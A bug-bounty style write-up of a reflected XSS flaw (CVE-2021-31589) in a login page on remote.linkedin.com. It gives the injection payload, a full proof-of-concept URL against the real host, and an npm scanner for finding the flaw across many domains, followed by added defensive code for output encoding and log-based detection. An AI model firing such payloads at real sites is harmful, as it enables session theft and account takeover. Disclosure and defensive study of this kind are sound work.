Write-up

Reflected XSS in LinkedIn

Bug Name: Reflected XSS
Bug Priority: Medium
CVE ID: CVE-2021-31589

Description

Cross-site scripting (also known as XSS) is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. It allows an attacker to circumvent the same origin policy, which is designed to segregate different websites from each other. Cross-site scripting vulnerabilities normally allow an attacker to masquerade as a victim user, to carry out any actions that the user is able to perform, and to access any of the user's data. If the victim user has privileged access within the application, then the attacker might be able to gain full control over all of the application's functionality and data.

Steps to identify

1) Spider or crawl the application.

2) Check whether the application exposes the path below:
/appliance/login.ns

3) Check for the password parameter:
?login[password]=

4) Insert an XSS payload into the password parameter, for example:
test"><svg/onload=alert("poc_by_karthithehacker")>

5) Check whether the alert pop-up appears. If it does, the parameter is
vulnerable.
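Why step 5 fires, and what the fix looks like, as an added example that is not code from the write-up or from the affected product (whose server-side code is not shown on this page): a hypothetical template renders the submitted password back into the login form. The vulnerable version interpolates the raw value into a double-quoted attribute, so a quote in the input closes the attribute and the rest of the string becomes markup; the hardened version applies contextual HTML encoding, which is the actual fix for this class of bug. The probe string is the one from the write-up; the function names are assumptions.

```javascript
// Added example (not from the write-up or the affected product): the same
// login form rendered two ways. The template is hypothetical.

// Vulnerable: the submitted password goes straight into value="...".
// A double quote in the input terminates the attribute, and everything
// after it is parsed as new markup.
function renderLoginVulnerable(password) {
  return `<input type="password" name="login[password]" value="${password}">`;
}

// Encode the characters that are active in HTML text and in double- or
// single-quoted attribute values.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')   // first, so later replacements are not re-encoded
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Hardened: contextual output encoding. The input can no longer leave the
// attribute value. (Echoing a password into the page at all is a separate
// design problem; the encoding is what removes the XSS.)
function renderLoginSafe(password) {
  return `<input type="password" name="login[password]" value="${escapeHtml(password)}">`;
}

// Reviewer check: is the rendered output still exactly one input tag whose
// attribute value contains no angle brackets? Anything else means the input
// injected markup.
function containsInjectedTag(html) {
  const expected = /^<input type="password" name="login\[password\]" value="[^<>]*">$/;
  return !expected.test(html);
}

// Constructed input: the probe string used in the write-up.
const PROBE = 'test"><svg/onload=alert("poc_by_karthithehacker")>';

if (typeof require !== 'undefined' && require.main === module) {
  console.log(renderLoginVulnerable(PROBE)); // attribute closed, <svg ...> tag emitted
  console.log(renderLoginSafe(PROBE));       // single input tag, payload inert
}
```

The check in `containsInjectedTag` is deliberately narrow: it only knows the one tag the template is supposed to emit, which is exactly why it is useful as a unit test for a fix of this kind.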

Impact

The actual impact of an XSS attack generally depends on the nature of the application, its functionality and data, and the status of the compromised user. For example:
* In a brochureware application, where all users are anonymous and all information is public, the impact will often be minimal.
* In an application holding sensitive data, such as banking transactions, emails, or healthcare records, the impact will usually be serious.
* If the compromised user has elevated privileges within the application, then the impact will generally be critical, allowing the attacker to take full control of the vulnerable application and compromise all users and their data.

Automation

Once you have the list of live domains, save all the URLs into a text file and load it into the cve-2021-31589 tool. You can install this tool with the command "npm install cve-2021-31589 -g".

PoC

https://remote.linkedin.com/appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(%22poc_by_karthithehacker%22)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password
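For the defending side, the PoC above is easy to spot in web-server access logs because the payload travels in the query string of a GET request. The following is an added example, not part of the write-up: it parses constructed combined-format log lines, decodes the login[password] parameter on /appliance/login.ns, and flags values that contain angle brackets or an on*= event-handler pattern. The log lines, IP addresses and timestamps are constructed; the path and parameter name come from the write-up.

```javascript
// Added example (not from the write-up): flag markup reflected through
// login[password] on /appliance/login.ns using access-log lines in the
// combined format. All lines below are constructed sample data.

const LOG_LINES = [
  '203.0.113.5 - - [10/Oct/2021:13:55:36 +0000] "GET /appliance/login.ns?login%5Bpassword%5D=hunter2&login%5Buse_curr%5D=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
  '198.51.100.7 - - [10/Oct/2021:13:56:01 +0000] "GET /appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(%22poc_by_karthithehacker%22)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password HTTP/1.1" 200 734 "-" "Mozilla/5.0"',
  '203.0.113.9 - - [10/Oct/2021:13:57:12 +0000] "GET /appliance/login.ns?login%5Bpassword%5D=pa%22ss HTTP/1.1" 200 512 "-" "curl/7.68.0"',
  '203.0.113.9 - - [10/Oct/2021:13:58:40 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
];

// client ip, timestamp, method and request target from a combined-format line
const REQUEST_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*"/;

// Decoded value is suspicious if it can open/close a tag or carries an
// inline event handler. A lone quote (common in real passwords) is not
// enough on its own, which keeps line 3 above from being a false positive.
const MARKUP_RE = /[<>]|\bon\w+\s*=/i;

function analyseLine(line) {
  const m = REQUEST_RE.exec(line);
  if (!m) return null;
  const [, ip, ts, method, rawUrl] = m;
  let u;
  try {
    // The base is only there so a path-relative target parses; it is a placeholder.
    u = new URL(rawUrl, 'http://placeholder.invalid');
  } catch (e) {
    return null; // unparseable target: out of scope for this rule
  }
  if (u.pathname !== '/appliance/login.ns') return null;
  // URLSearchParams percent-decodes and turns '+' into a space, and
  // tolerates malformed escapes instead of throwing.
  const value = u.searchParams.get('login[password]');
  if (value === null || !MARKUP_RE.test(value)) return null;
  return { ip, ts, method, value };
}

// Returns one finding per matching line.
function scan(lines) {
  return lines.map(analyseLine).filter(Boolean);
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of scan(LOG_LINES)) {
    console.log(`${f.ts} ${f.ip} ${f.method} login[password]=${JSON.stringify(f.value)}`);
  }
}
```

Two caveats when turning this into a real rule: the same parameter submitted in a POST body will not appear in access logs at all, so the rule only covers the GET form used in the PoC; and matching on decoded values is what matters here, since the payload is fully percent-encoded on the wire and a raw-string match on "<svg" would miss it.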